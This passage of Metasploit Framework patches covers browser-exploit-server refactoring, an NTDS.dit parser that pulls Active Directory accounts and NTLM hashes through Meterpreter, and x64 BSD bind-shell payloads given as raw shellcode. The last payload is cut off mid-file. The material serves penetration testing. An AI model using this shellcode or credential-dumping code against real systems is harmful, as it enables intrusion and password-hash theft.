+++ b/lib/msf/core/exploit/remote/browser_profile_manager.rb
@@ -1,69 +1,46 @@
+require 'Msgpack'
+
 module Msf
   module Exploit::Remote::BrowserProfileManager
-  	def initialize(info={})
-  		super
-  		# See get_profile's documentation to understand what @target_profiles stores
-  		@target_profiles = {}
-  	end
 
+    public
 
-    # Returns the target profile based on the tag. Each profile has the following structure:
-    # 'cookie_name' =>
-    # {
-    #   :os_name   => 'Windows 7'
-    #   ...... etc ......
-    # }
-    # A profile should at least have info about the following:
-    # :source    : The data source. Either from 'script', or 'headers'. The 'script' source
-    #              should be more accurate in some scenarios like browser compatibility mode
-    # :ua_name   : The name of the browser
-    # :ua_ver    : The version of the browser (not yet implemented)
-    # :os_name   : The name of the OS ("Windows XP")
-    # :language  : The system's language
-    # :arch      : The system's arch
-    # :proxy     : Indicates whether proxy is used
-    #
-    # For more info about what the actual value might be for each key, see HttpServer.
-    #
-    # If the source is 'script', the profile might have even more information about plugins:
-    # 'office'       : The version of Microsoft Office (IE only)
-    # 'activex'      : Whether a specific set of clsid & method is available from an ActiveX control (IE only)
-    # 'java'         : The Java version
-    # 'mshtml_build' : The MSHTML build version
-    # 'flash'        : The Flash version
-    # 'silverlight'  : The Silverlight version
-    #
-    # @param tag [String] Either a cookie or IP + User-Agent
-    # @return [Hash] The profile found. If not found, returns nil
-    def get_profile(tag)
-      sync do
-        return @target_profiles[tag]
+    NOTE_TYPE_PREFIX = 'BrowserExploitServer.Client'
+
+    def get_profile_info(tag)
+      normalized_tag = "#{NOTE_TYPE_PREFIX}.#{tag}"
+      framework.db.notes.each do |note|
+        return MessagePack.unpack(note.data) if note.ntype == normalized_tag 
       end
+
+      {}
     end
 
-
-    # Updates information for a specific profile
-    #
-    # @param target_profile [Hash] The profile to update
-    # @param key [Symbol] The symbol to use for the hash
-    # @param value [String] The value to assign
-    def update_profile(target_profile, key, value)
-      sync do
-        target_profile[key] = value
+    def update_profile(tag, key, value)
+      profile = get_profile_info(tag)
+      if profile.empty?
+        init_profile(tag)
+        profile = get_profile_info(tag)
       end
+
+      normalized_tag = "#{NOTE_TYPE_PREFIX}.#{tag}"
+      profile[normalized_tag][key.to_s] = value
+      framework.db.report_note(
+        :type => normalized_tag,
+        :data => profile.to_msgpack,
+        :update => :unique
+      )
     end
 
-
-    # Initializes a profile, if it did not previously exist
-    #
-    # @param tag [String] A unique string as a way to ID the profile
     def init_profile(tag)
-      sync do
-        @target_profiles[tag] ||= {}
-      end
+      normalized_tag = "#{NOTE_TYPE_PREFIX}.#{tag}"
+      empty_profile = { normalized_tag => {} }
+      framework.db.report_note(
+        :type => normalized_tag,
+        :data => empty_profile.to_msgpack,
+        :update => :unique
+      )
     end
 
-
-    
   end
-end
\ No newline at end of file
+end

From 3fef6362bd987975528450a813cfd95aee9575b1 Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Wed, 29 Apr 2015 21:55:21 -0500
Subject: [PATCH 0038/1013] Fix sorting

---
 lib/msf/core/exploit/browserautopwnv2.rb | 19 ++++++++++++++-----
 1 file changed, 14 insertions(+), 5 deletions(-)

diff --git a/lib/msf/core/exploit/browserautopwnv2.rb b/lib/msf/core/exploit/browserautopwnv2.rb
index 3ede415109..2a29010954 100644
--- a/lib/msf/core/exploit/browserautopwnv2.rb
+++ b/lib/msf/core/exploit/browserautopwnv2.rb
@@ -35,7 +35,8 @@ module Msf
     # Returns all the found exploit modules that support BrowserExploitServer by going through all
     # the exploits from the framework object.
     #
-    # @note This method is using framework.exploits and it's one of the reasons why it's so slow.
+    # @note This method is using framework.exploits and it's one of the reasons why it's so slow,
+    #       and will only get slower.
     # @todo Maybe look for a different way to get a list of exploits.
     # @return [Array] A collection of BES modules in this format: [module_fullname, Class].
     def init_exploit_paths
@@ -48,6 +49,7 @@ module Msf
 
     # Initializes the @bap_exploits instance variable with all the found BAP exploits.
     #
+    # @note The more BES exploits, the slower this gets.
     # @see #bap_exploits The read-only attribute.
     # @return [void]
     def init_exploits
@@ -179,10 +181,11 @@ module Msf
     # @see #bap_exploits The read-only attribute.
     # @param [Hash] A grouped module list.
     # @return [void]
-    def finalize_sorted_modules(bap_groups)
+    def finalize_sorted_modules(bap_groups, max=20)
       @bap_exploits = []
       bap_groups.each_pair do |ranking, module_list|
         module_list.each do |m|
+          break if @bap_exploits.length >= max
           @bap_exploits << m
         end
       end
@@ -315,18 +318,24 @@ module Msf
 
     def show_ready_exploits
       table = Rex::Ui::Text::Table.new(
-        "Header"  => "Exploits",
-        "Indent"  => 1,
-        "Columns" => ["Rank", "Name", "Path", "Payload"]
+        'Header'  => 'Exploits',
+        'Indent'  => 1,
+        'Columns' => ['Order', 'Rank', 'Name', 'Path', 'Payload']
       )
 
+      # Without the order, sometimes the Rex table messes up even though in the array
+      # the order looks right. So don't get rid of this.
+      order = 1
+
       bap_exploits.each do |m|
         table << [
+          order,
           parse_rank(m.rank),
           m.shortname,
           m.datastore['URIPATH'],
           "#{m.datastore['PAYLOAD']} on #{m.datastore['LPORT']}"
         ]
+        order += 1
       end
 
       print_line

From a34531ba5d57a8a0bb15ca2300005dd82d71c5e2 Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Wed, 29 Apr 2015 23:14:52 -0500
Subject: [PATCH 0039/1013] Msgpack cannot handle symbols, so we're forced to
 strings

---
 lib/msf/core/exploit/browserautopwnv2.rb      |  1 -
 .../exploit/remote/browser_exploit_server.rb  | 34 +++++++++----------
 2 files changed, 17 insertions(+), 18 deletions(-)

diff --git a/lib/msf/core/exploit/browserautopwnv2.rb b/lib/msf/core/exploit/browserautopwnv2.rb
index 2a29010954..7d639d6ceb 100644
--- a/lib/msf/core/exploit/browserautopwnv2.rb
+++ b/lib/msf/core/exploit/browserautopwnv2.rb
@@ -302,7 +302,6 @@ module Msf
       print_status("Searching BES exploits, please wait...")
       init_exploits
       sort_bap_exploits
-      print_status("#{@bap_exploits.length} BES exploits found.")
 
       print_status("Starting exploit modules...")
       start_exploits
diff --git a/lib/msf/core/exploit/remote/browser_exploit_server.rb b/lib/msf/core/exploit/remote/browser_exploit_server.rb
index f2757aa68f..dec4295d38 100644
--- a/lib/msf/core/exploit/remote/browser_exploit_server.rb
+++ b/lib/msf/core/exploit/remote/browser_exploit_server.rb
@@ -51,22 +51,22 @@ module Msf
 
     # Requirements a browser module can define in either BrowserRequirements or in targets
     REQUIREMENT_KEY_SET = Set.new([
-      :source,       # Return either 'script' or 'headers'
-      :ua_name,      # Example: Returns 'MSIE'
-      :ua_ver,       # Example: Returns '8.0', '9.0'
-      :os_name,      # Example: Returns 'Windows 7', 'Linux'
-      :os_device,    # Example: Returns 'iPad', 'iPhone', etc
-      :os_vendor,    # Example: Returns 'Microsoft', 'Ubuntu', 'Apple', etc
-      :os_sp,        # Example: Returns 'SP2'
-      :language,     # Example: Returns 'en-us'
-      :arch,         # Example: Returns 'x86'
-      :proxy,        # Returns 'true' or 'false'
-      :silverlight,  # Returns 'true' or 'false'
-      :office,       # Example: Returns "2007", "2010"
-      :java,         # Example: Return '1.6', or maybe '1.6.0.0' (depends)
-      :mshtml_build, # mshtml build. Example: Returns "65535"
-      :flash,        # Example: Returns "12.0" (chrome/ff) or "12.0.0.77" (IE)
-      :vuln_test,    # Example: "if(window.MyComponentIsInstalled)return true;",
+      'source',       # Return either 'script' or 'headers'
+      'ua_name',      # Example: Returns 'MSIE'
+      'ua_ver',       # Example: Returns '8.0', '9.0'
+      'os_name',      # Example: Returns 'Windows 7', 'Linux'
+      'os_device',    # Example: Returns 'iPad', 'iPhone', etc
+      'os_vendor',    # Example: Returns 'Microsoft', 'Ubuntu', 'Apple', etc
+      'os_sp',        # Example: Returns 'SP2'
+      'language',     # Example: Returns 'en-us'
+      'arch',         # Example: Returns 'x86'
+      'proxy',        # Returns 'true' or 'false'
+      'silverlight',  # Returns 'true' or 'false'
+      'office',       # Example: Returns "2007", "2010"
+      'java',         # Example: Return '1.6', or maybe '1.6.0.0' (depends)
+      'mshtml_build', # mshtml build. Example: Returns "65535"
+      'flash',        # Example: Returns "12.0" (chrome/ff) or "12.0.0.77" (IE)
+      'vuln_test',    # Example: "if(window.MyComponentIsInstalled)return true;",
       # :activex is a special case.
       # When you set this requirement in your module, this is how it should be:
       # [{:clsid=>'String', :method=>'String'}]
@@ -74,7 +74,7 @@ module Msf
       # But when BES receives this information, the JavaScript will return this format:
       # "{CLSID}=>Method=>Boolean;"
       # Also see: #has_bad_activex?
-      :activex
+      'activex'
     ])
 
     def initialize(info={})

From 62e3f5e56a75ff284c7081e389c85b7cc04d1683 Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Wed, 29 Apr 2015 23:15:56 -0500
Subject: [PATCH 0040/1013] Small cleanup

---
 .../core/exploit/remote/browser_exploit_server.rb    | 12 ------------
 1 file changed, 12 deletions(-)

diff --git a/lib/msf/core/exploit/remote/browser_exploit_server.rb b/lib/msf/core/exploit/remote/browser_exploit_server.rb
index dec4295d38..6e2edcc9f4 100644
--- a/lib/msf/core/exploit/remote/browser_exploit_server.rb
+++ b/lib/msf/core/exploit/remote/browser_exploit_server.rb
@@ -248,9 +248,7 @@ module Msf
     # @param request [Rex::Proto::Http::Request] The HTTP request sent by the browser
     def retrieve_tag(cli, request)
       cookie = CGI::Cookie.parse(request.headers['Cookie'].to_s)
-      #$stderr.puts "Found cookie: #{cookie.inspect}"
       tag = cookie.has_key?(cookie_name) && cookie[cookie_name].first
-      #$stderr.puts "Found tag: #{tag}"
 
       if tag.blank?
         # Browser probably doesn't allow cookies, plan B :-/
@@ -588,13 +586,3 @@ module Msf
 
   end
 end
-
-
-
-=begin
-
-TODO:
-Use notes to store client profiles, and then use framework.db.notes
-to retrieve notes in order to look up a profile.
-
-=end

From 35f564d03edc2f9efa766b7dc2eade915383fe5a Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Thu, 30 Apr 2015 00:32:33 -0500
Subject: [PATCH 0041/1013] I just shaved off 8 seconds, oh yeah

---
 lib/msf/core/exploit/browserautopwnv2.rb      | 47 +++++--------------
 .../exploit/remote/browser_exploit_server.rb  |  8 ++++
 2 files changed, 19 insertions(+), 36 deletions(-)

diff --git a/lib/msf/core/exploit/browserautopwnv2.rb b/lib/msf/core/exploit/browserautopwnv2.rb
index 7d639d6ceb..b3b119514d 100644
--- a/lib/msf/core/exploit/browserautopwnv2.rb
+++ b/lib/msf/core/exploit/browserautopwnv2.rb
@@ -35,46 +35,20 @@ module Msf
     # Returns all the found exploit modules that support BrowserExploitServer by going through all
     # the exploits from the framework object.
     #
-    # @note This method is using framework.exploits and it's one of the reasons why it's so slow,
-    #       and will only get slower.
-    # @todo Maybe look for a different way to get a list of exploits.
-    # @return [Array] A collection of BES modules in this format: [module_fullname, Class].
-    def init_exploit_paths
-      framework.exploits.find_all do |m|
-        next if !m.first.include?('browser') || m.last == "__SYMBOLIC__" || m.last.fullname == self.fullname
-        m.last.ancestors.include? Msf::Exploit::Remote::BrowserExploitServer
-      end
-    end
-
-
-    # Initializes the @bap_exploits instance variable with all the found BAP exploits.
-    #
-    # @note The more BES exploits, the slower this gets.
-    # @see #bap_exploits The read-only attribute.
     # @return [void]
     def init_exploits
-      # Initialized BES modules are held here
-      @bap_exploits = []
-
-      init_exploit_paths.each do |m|
-        module_name = m.first
-        xploit = framework.exploits.create(module_name)
-        unless xploit
-          print_status("Failed to load: #{name}")
+      # First we're going to avoid using #find_all because that gets very slow.
+      framework.exploits.each_pair do |fullname, plader_holder|
+        next if !fullname.include?('browser') || self.fullname == "exploit/#{fullname}"
+        mod = framework.exploits.create(fullname)
+        unless mod
+          print_status("Failed to load: #{fullname}")
           next
         end
-        set_exploit_options(xploit)
-        @bap_exploits << xploit
-      end
-    end
-
-
-    # Prints BAP module names
-    #
-    # @return [void]
-    def list_bap_names
-      bap_exploits.each do |m|
-        print_status(m.fullname)
+        if mod.methods.include?(:is_browser_exploit_server?)
+          set_exploit_options(mod)
+          @bap_exploits << mod
+        end
       end
     end
 
@@ -298,6 +272,7 @@ module Msf
       t1 = Time.now
       self.datastore['MODULEOWNER'] = 'BAP'
       super
+      @bap_exploits = []
 
       print_status("Searching BES exploits, please wait...")
       init_exploits
diff --git a/lib/msf/core/exploit/remote/browser_exploit_server.rb b/lib/msf/core/exploit/remote/browser_exploit_server.rb
index 6e2edcc9f4..723c8d2b47 100644
--- a/lib/msf/core/exploit/remote/browser_exploit_server.rb
+++ b/lib/msf/core/exploit/remote/browser_exploit_server.rb
@@ -111,6 +111,14 @@ module Msf
     end
 
 
+    # This allows BrowserAutoPwn's loader to identify which browser exploits are using BES, and
+    # which ones aren't. This is a way to get around the expensive #find_all in order to retrieve
+    # the #ancestors information.
+    def is_browser_exploit_server?
+      true
+    end
+
+
     # Returns the custom 404 URL set by the user
     #
     # @return [String]

From acb833bd09edfda66f7a9fc3fa83f4b9ee64ed2e Mon Sep 17 00:00:00 2001
From: David Maloney <DMaloney@rapid7.com>
Date: Thu, 30 Apr 2015 14:57:30 -0500
Subject: [PATCH 0042/1013] NTDS::Parser class built out

the NTDS Parser class will take a meterpreter
client and a fielpath and provide an enumerator for reading
out the user accounts as ruby objects

MSP-12357
---
 lib/metasploit/framework/ntds/parser.rb       | 74 +++++++++++++++++++
 .../post/meterpreter/extensions/priv/priv.rb  |  2 +-
 2 files changed, 75 insertions(+), 1 deletion(-)
 create mode 100644 lib/metasploit/framework/ntds/parser.rb

diff --git a/lib/metasploit/framework/ntds/parser.rb b/lib/metasploit/framework/ntds/parser.rb
new file mode 100644
index 0000000000..2a866cc55e
--- /dev/null
+++ b/lib/metasploit/framework/ntds/parser.rb
@@ -0,0 +1,74 @@
+module Metasploit
+  module Framework
+    module NTDS
+      require 'metasploit/framework/ntds/account'
+      # This class respresent an NTDS parser. It interacts with the Meterpreter Client
+      # to provide a simple interface for enumerating AD user accounts.
+      class Parser
+
+        # The size, in bytes, of an NTDS account object
+        ACCOUNT_SIZE = 3948
+        # The size, in Bytes, of a batch of NTDS accounts
+        BATCH_SIZE = 78960
+
+        # @!attribute channel
+        #   @return [Rex::Post::Meterpreter::Channels::Pool] The Meterpreter NTDS Parser Channel
+        attr_accessor :channel
+        # @!attribute client
+        #   @return [Msf::Session] The Meterpreter Client
+        attr_accessor :client
+        # @!attribute file_path
+        #   @return [String] The path to the NTDS.dit file on the remote system
+        attr_accessor :file_path
+
+        def initialize(client, file_path='')
+          raise ArgumentError, "Invalid Filepath" unless file_path.present?
+          @file_path = file_path
+          @channel = client.priv.ntds_parse(file_path)
+          @client = client
+        end
+
+        # Yields a [Metasploit::Framework::NTDS::Account] for each account found
+        # in the remote NTDS.dit file.
+        #
+        # @yieldparam account [Metasploit::Framework::NTDS::Account] an AD user account
+        # @return [void] does not return a value
+         def each_account
+           raw_batch_data = pull_batch
+           until raw_batch_data.nil?
+             batch = raw_batch_data.dup
+             while batch.present?
+               raw_data = batch.slice!(0,ACCOUNT_SIZE)
+               # Make sure our data isn't all Null-bytes
+               if raw_data.match(/[^\x00]/)
+                 account = Metasploit::Framework::NTDS::Account.new(raw_data)
+                 yield account
+               end
+             end
+             raw_batch_data = pull_batch
+           end
+           channel.close
+         end
+
+        private
+
+        def pull_batch
+          if channel.cid.nil?
+            reopen_channel
+          end
+          begin
+            raw_batch_data = channel.read(BATCH_SIZE)
+          rescue EOFError
+            raw_batch_data = nil
+          end
+          raw_batch_data
+        end
+
+        def reopen_channel
+          @channel = client.priv.ntds_parse(file_path)
+        end
+
+      end
+    end
+  end
+end
\ No newline at end of file
diff --git a/lib/rex/post/meterpreter/extensions/priv/priv.rb b/lib/rex/post/meterpreter/extensions/priv/priv.rb
index 65f2b34e82..f79349d570 100644
--- a/lib/rex/post/meterpreter/extensions/priv/priv.rb
+++ b/lib/rex/post/meterpreter/extensions/priv/priv.rb
@@ -103,7 +103,7 @@ class Priv < Extension
     if channel_id.nil?
       raise Exception, "We did not get a channel back!"
     end
-    channel = Rex::Post::Meterpreter::Channels::Pools::StreamPool.new(client, channel_id, "priv_ntds", CHANNEL_FLAG_SYNCHRONOUS)
+    channel = Rex::Post::Meterpreter::Channels::Pool.new(client, channel_id, "priv_ntds", CHANNEL_FLAG_SYNCHRONOUS)
   end
 
   #

From 5ae06310b6810370a961c844af35c8303fd084a8 Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Thu, 30 Apr 2015 18:59:44 -0500
Subject: [PATCH 0043/1013] Do some option handling

---
 modules/exploits/multi/browser/autopwn.rb | 23 +++++++++++++++++++++++
 1 file changed, 23 insertions(+)

diff --git a/modules/exploits/multi/browser/autopwn.rb b/modules/exploits/multi/browser/autopwn.rb
index ba227899d2..4fdf5b0912 100644
--- a/modules/exploits/multi/browser/autopwn.rb
+++ b/modules/exploits/multi/browser/autopwn.rb
@@ -39,6 +39,29 @@ class Metasploit3 < Msf::Exploit::Remote
           ]
         ],
       'DefaultTarget'  => 0))
+
+    register_advanced_options(get_payload_options, self.class)
+
+    deregister_options('Retries', 'DisablePayloadHandler', 'ContextInformationFile')
+  end
+
+  def setup
+    if datastore['PAYLOAD'] != 'windows/meterpreter/reverse_tcp'
+      msg = "\"set payload\" is disabled: Instead of using \"set payload\", please set PAYLOAD_[platform] "
+      msg << "to set a platform-specific payload, and set PAYLOAD_[platform]_LPORT "
+      msg << "to set a platform-specific LPORT."
+      raise RuntimeError, msg
+    end
+    super
+  end
+
+  def get_payload_options
+    opts = []
+    DEFAULT_PAYLOADS.each_pair do |platform, payload_info|
+      opts << OptString.new("PAYLOAD_#{platform.upcase}", [true, "Payload for #{platform} browser exploits", payload_info['payload'] ])
+      opts << OptInt.new("PAYLOAD_#{platform.upcase}_LPORT", [true, "Payload LPORT for #{platform} browser exploits", payload_info['lport']])
+    end
+    opts
   end
 
   def on_request_exploit(cli, request, target_info)

From 08b5f71f998477d309e873fe22aafed3c6ca8bef Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Thu, 30 Apr 2015 19:09:08 -0500
Subject: [PATCH 0044/1013] More options

---
 modules/exploits/multi/browser/autopwn.rb | 24 +++++++++--------------
 1 file changed, 9 insertions(+), 15 deletions(-)

diff --git a/modules/exploits/multi/browser/autopwn.rb b/modules/exploits/multi/browser/autopwn.rb
index 4fdf5b0912..61c987bb6d 100644
--- a/modules/exploits/multi/browser/autopwn.rb
+++ b/modules/exploits/multi/browser/autopwn.rb
@@ -25,22 +25,15 @@ class Metasploit3 < Msf::Exploit::Remote
       'Platform'       => %w{ java linux osx solaris win android firefox },
       'Privileged'     => false,
       'DisclosureDate' => "Feb 5 2014",
-      'Targets'        =>
-        [
-          [ 'Automatic', {} ],
-          [
-            'OSX Target',
-            {
-              :os_name => 'Mac OS X',
-              'Rop'   => :msvcrt,
-              'Pivot' => 0x77c15ed5, # xchg eax, esp; ret
-              'Align' => 0x77c4d801  # add esp, 0x2c; ret
-            }
-          ]
-        ],
+      'Targets'        => [ [ 'Automatic', {} ] ],
       'DefaultTarget'  => 0))
 
-    register_advanced_options(get_payload_options, self.class)
+    register_advanced_options(get_advanced_options, self.class)
+
+    register_options(
+      [
+        OptEnum.new('Action', [false, 'Action', 'WebServer', ['WebServer','DefangedDetection', 'list'], 'WebServer'])
+      ] ,self.class)
 
     deregister_options('Retries', 'DisablePayloadHandler', 'ContextInformationFile')
   end
@@ -55,12 +48,13 @@ class Metasploit3 < Msf::Exploit::Remote
     super
   end
 
-  def get_payload_options
+  def get_advanced_options
     opts = []
     DEFAULT_PAYLOADS.each_pair do |platform, payload_info|
       opts << OptString.new("PAYLOAD_#{platform.upcase}", [true, "Payload for #{platform} browser exploits", payload_info['payload'] ])
       opts << OptInt.new("PAYLOAD_#{platform.upcase}_LPORT", [true, "Payload LPORT for #{platform} browser exploits", payload_info['lport']])
     end
+
     opts
   end
 

From 2bbae6b9c27c9f6b2e03badf8e7faa9a38974618 Mon Sep 17 00:00:00 2001
From: David Maloney <DMaloney@rapid7.com>
Date: Fri, 1 May 2015 11:24:23 -0500
Subject: [PATCH 0045/1013] add #to_s to ntds account

added to_s method to the NTDS account
for easy output

MSP-12357
---
 lib/metasploit/framework/ntds/account.rb | 53 +++++++++++++++++++++++-
 1 file changed, 51 insertions(+), 2 deletions(-)

diff --git a/lib/metasploit/framework/ntds/account.rb b/lib/metasploit/framework/ntds/account.rb
index cefeca15e7..499ea42a65 100644
--- a/lib/metasploit/framework/ntds/account.rb
+++ b/lib/metasploit/framework/ntds/account.rb
@@ -91,8 +91,8 @@ module Metasploit
           @logon_count = get_int(data)
           @nt_history_count = get_int(data)
           @lm_history_count = get_int(data)
-          @expiry_data = get_string(data,30)
-          @logon_data =  get_string(data,30)
+          @expiry_date = get_string(data,30)
+          @logon_date =  get_string(data,30)
           @logon_time = get_string(data,30)
           @pass_date = get_string(data,30)
           @pass_time = get_string(data,30)
@@ -103,6 +103,35 @@ module Metasploit
           @sid = data
         end
 
+        # @return [String] String representation of the account data
+        def to_s
+          <<EOS
+#{@name} (#{@description})
+#{ntlm_hash}
+Password Expires: #{@expiry_date}
+Last Password Change: #{@pass_time} #{@pass_date}
+Last Logon: #{@logon_time} #{@logon_date}
+Logon Count: #{@logon_count}
+#{uac_string}
+Hash History:
+#{hash_history}
+EOS
+        end
+
+        # @return [String] the NTLM hash string for the current password
+        def ntlm_hash
+          "#{@name}:#{@rid}:#{@lm_hash}:#{@nt_hash}"
+        end
+
+        # @return [String] Each historical NTLM Hash on a new line
+        def hash_history
+          history_string = ''
+          @lm_history.each_with_index do | lm_hash, index|
+            history_string << "#{@name}:#{@rid}:#{lm_hash}:#{@nt_history[index]}\n"
+          end
+          history_string
+        end
+
         private
 
         def get_boolean(data)
@@ -123,6 +152,26 @@ module Metasploit
         def get_string(data,length)
           data.slice!(0,length).gsub(/\x00/,'')
         end
+
+        def uac_string
+          status_string = ''
+          if @disabled
+            status_string << " - Account Disabled\n"
+          end
+          if @expired
+            status_string << " - Password Expired\n"
+          end
+          if @locked
+            status_string << " - Account Locked Out\n"
+          end
+          if @no_expire
+            status_string << " - Password Never Expires\n"
+          end
+          if @no_pass
+            status_string << " - No Password Required\n"
+          end
+          status_string
+        end
       end
     end
   end

From a0539cd6722db8123f9b5b317e67e5c515076903 Mon Sep 17 00:00:00 2001
From: Balazs Bucsay <github@rycon.hu>
Date: Sat, 2 May 2015 20:50:22 +0200
Subject: [PATCH 0046/1013] new x64 bsd shellcodes (bind/reverse) ipv4/6. ipv4
 shells are smaller than the existing one.

---
 .../singles/bsd/x64/shell_bind_ipv6_tcp.rb    | 84 +++++++++++++++++
 .../singles/bsd/x64/shell_bind_tcp_small.rb   | 83 +++++++++++++++++
 .../singles/bsd/x64/shell_reverse_ipv6_tcp.rb | 90 +++++++++++++++++++
 .../bsd/x64/shell_reverse_tcp_small.rb        | 78 ++++++++++++++++
 4 files changed, 335 insertions(+)
 create mode 100644 modules/payloads/singles/bsd/x64/shell_bind_ipv6_tcp.rb
 create mode 100644 modules/payloads/singles/bsd/x64/shell_bind_tcp_small.rb
 create mode 100644 modules/payloads/singles/bsd/x64/shell_reverse_ipv6_tcp.rb
 create mode 100644 modules/payloads/singles/bsd/x64/shell_reverse_tcp_small.rb

diff --git a/modules/payloads/singles/bsd/x64/shell_bind_ipv6_tcp.rb b/modules/payloads/singles/bsd/x64/shell_bind_ipv6_tcp.rb
new file mode 100644
index 0000000000..ce5aa4d830
--- /dev/null
+++ b/modules/payloads/singles/bsd/x64/shell_bind_ipv6_tcp.rb
@@ -0,0 +1,84 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'msf/core/handler/bind_tcp'
+require 'msf/base/sessions/command_shell'
+require 'msf/base/sessions/command_shell_options'
+
+module Metasploit3
+
+  include Msf::Payload::Single
+  include Msf::Payload::Bsd
+  include Msf::Sessions::CommandShellOptions
+
+  def initialize(info = {})
+    super(merge_info(info,
+      'Name'          => 'BSD x64 Command Shell, Bind TCP Inline (IPv6)',
+      'Description'   => 'Listen for a connection and spawn a command shell over IPv6',
+      'Author'        => 'Balazs Bucsay @xoreipeip <balazs.bucsay[-at-]rycon[-dot-]hu>',
+      'References'    => ['URL', 'https://github.com/earthquake/shellcodes/blob/master/x86_64_bsd_ipv6_bind_tcp.asm.c'],
+      'License'       => MSF_LICENSE,
+      'Platform'      => 'bsd',
+      'Arch'          => ARCH_X86_64,
+      'Handler'       => Msf::Handler::BindTcp,
+      'Session'       => Msf::Sessions::CommandShellUnix,
+      'Payload'       =>
+        {
+          'Offsets' =>
+            {
+              'LPORT'    => [ 20, 'n' ],
+            },
+          'Payload' =>
+            "\x6a\x61"             +#   pushq  $0x61                       #
+            "\x58"                 +#  	pop    %rax                        #
+            "\x99"                 +#  	cltd                               #
+            "\x6a\x1c"             +#   pushq  $0x1c                       #
+            "\x5f"                 +#  	pop    %rdi                        #
+            "\x6a\x01"             +#   pushq  $0x1                        #
+            "\x5e"                 +#  	pop    %rsi                        #
+            "\x0f\x05"             +#   syscall                            #
+            "\x48\x97"             +#   xchg   %rax,%rdi                   #
+            "\x52"                 +#  	push   %rdx                        #
+            "\x52"                 +#  	push   %rdx                        #
+            "\x52"                 +#  	push   %rdx                        #
+            "\x68\x00\x1c\x11\x5c" +#   pushq  $0x5c111c00                 #
+            "\x48\x89\xe6"         +#   mov    %rsp,%rsi                   #
+            "\x6a\x1c"             +#   pushq  $0x1c                       #
+            "\x5a"                 +#  	pop    %rdx                        #
+            "\x04\x4c"             +#   add    $0x4c,%al                   #
+            "\x0f\x05"             +#   syscall                            #
+            "\x48\x31\xf6"         +#   xor    %rsi,%rsi                   #
+            "\x6a\x6a"             +#   pushq  $0x6a                       #
+            "\x58"                 +#  	pop    %rax                        #
+            "\x0f\x05"             +#   syscall                            #
+            "\x99"                 +#  	cltd                               #
+            "\x04\x1e"             +#   add    $0x1e,%al                   #
+            "\x0f\x05"             +#   syscall                            #
+            "\x48\x89\xc7"         +#   mov    %rax,%rdi                   #
+            "\x6a\x5a"             +#   pushq  $0x5a                       #
+            "\x58"                 +#  	pop    %rax                        #
+            "\x0f\x05"             +#   syscall                            #
+            "\xff\xc6"             +#   inc    %esi                        #
+            "\x04\x5a"             +#   add    $0x5a,%al                   #
+            "\x0f\x05"             +#   syscall                            #
+            "\xff\xc6"             +#  	inc    %esi                        #
+            "\x04\x59"             +#  	add    $0x59,%al                   #
+            "\x0f\x05"             +#  	syscall                            #
+            "\x52"                 +# 	push   %rdx                        #
+            "\x48\xbf\x2f\x2f\x62" +#   mov "//b"                          #
+	    "\x69\x6e\x2f\x73\x68" +# 	mov "in/sh",%rdi                   #
+            "\x57"                 +#	push   %rdi                        #
+            "\x48\x89\xe7"         +# 	mov    %rsp,%rdi                   #
+            "\x52"                 +# 	push   %rdx                        #
+            "\x57"                 +# 	push   %rdi                        #
+            "\x48\x89\xe6"         +#   mov    %rsp,%rsi                   #
+            "\x04\x39"             +#  	add    $0x39,%al                   #
+            "\x0f\x05"              # 	syscall                            #
+        }
+      ))
+  end
+
+end
diff --git a/modules/payloads/singles/bsd/x64/shell_bind_tcp_small.rb b/modules/payloads/singles/bsd/x64/shell_bind_tcp_small.rb
new file mode 100644
index 0000000000..afe41f1e11
--- /dev/null
+++ b/modules/payloads/singles/bsd/x64/shell_bind_tcp_small.rb
@@ -0,0 +1,83 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'msf/core/handler/bind_tcp'
+require 'msf/base/sessions/command_shell'
+require 'msf/base/sessions/command_shell_options'
+
+module Metasploit3
+
+  include Msf::Payload::Single
+  include Msf::Payload::Bsd
+  include Msf::Sessions::CommandShellOptions
+
+  def initialize(info = {})
+    super(merge_info(info,
+      'Name'          => 'BSD x64 Command Shell, Bind TCP Inline',
+      'Description'   => 'Listen for a connection and spawn a command shell',
+      'Author'        => 'Balazs Bucsay @xoreipeip <balazs.bucsay[-at-]rycon[-dot-]hu>',
+      'References'    => ['URL', 'https://github.com/earthquake/shellcodes/blob/master/x86_64_bsd_bind_tcp.asm.c'],
+      'License'       => MSF_LICENSE,
+      'Platform'      => 'bsd',
+      'Arch'          => ARCH_X86_64,
+      'Handler'       => Msf::Handler::BindTcp,
+      'Session'       => Msf::Sessions::CommandShellUnix,
+      'Payload'       =>
+        {
+          'Offsets' =>
+            {
+              'LPORT'    => [ 18, 'n' ],
+            },
+          'Payload' =>
+            "\x6a\x61"             +#	pushq  $0x61                       #
+            "\x58"                 +#	pop    %rax                        #
+            "\x99"                 +#	cltd                               #
+            "\x6a\x02"             +#	pushq  $0x2                        #
+            "\x5f"                 +#	pop    %rdi                        #
+            "\x6a\x01"             +#	pushq  $0x1                        #
+            "\x5e"                 +#	pop    %rsi                        #
+            "\x0f\x05"             +#	syscall                            #
+            "\x48\x97"             +#	xchg   %rax,%rdi                   #
+            "\x52"                 +#	push   %rdx                        #
+            "\x68\x00\x02\x11\x5c" +#	pushq  $0x5c110200                 #
+            "\x48\x89\xe6"         +#	mov    %rsp,%rsi                   #
+            "\x6a\x10"             +#	pushq  $0x10                       #
+            "\x5a"                 +#	pop    %rdx                        #
+            "\x04\x66"             +#	add    $0x66,%al                   #
+            "\x0f\x05"             +#	syscall                            #
+            "\x48\x31\xf6"         +#	xor    %rsi,%rsi                   #
+            "\x6a\x6a"             +#	pushq  $0x6a                       #
+            "\x58"                 +#	pop    %rax                        #
+            "\x0f\x05"             +#	syscall                            #
+            "\x99"                 +#	cltd                               #
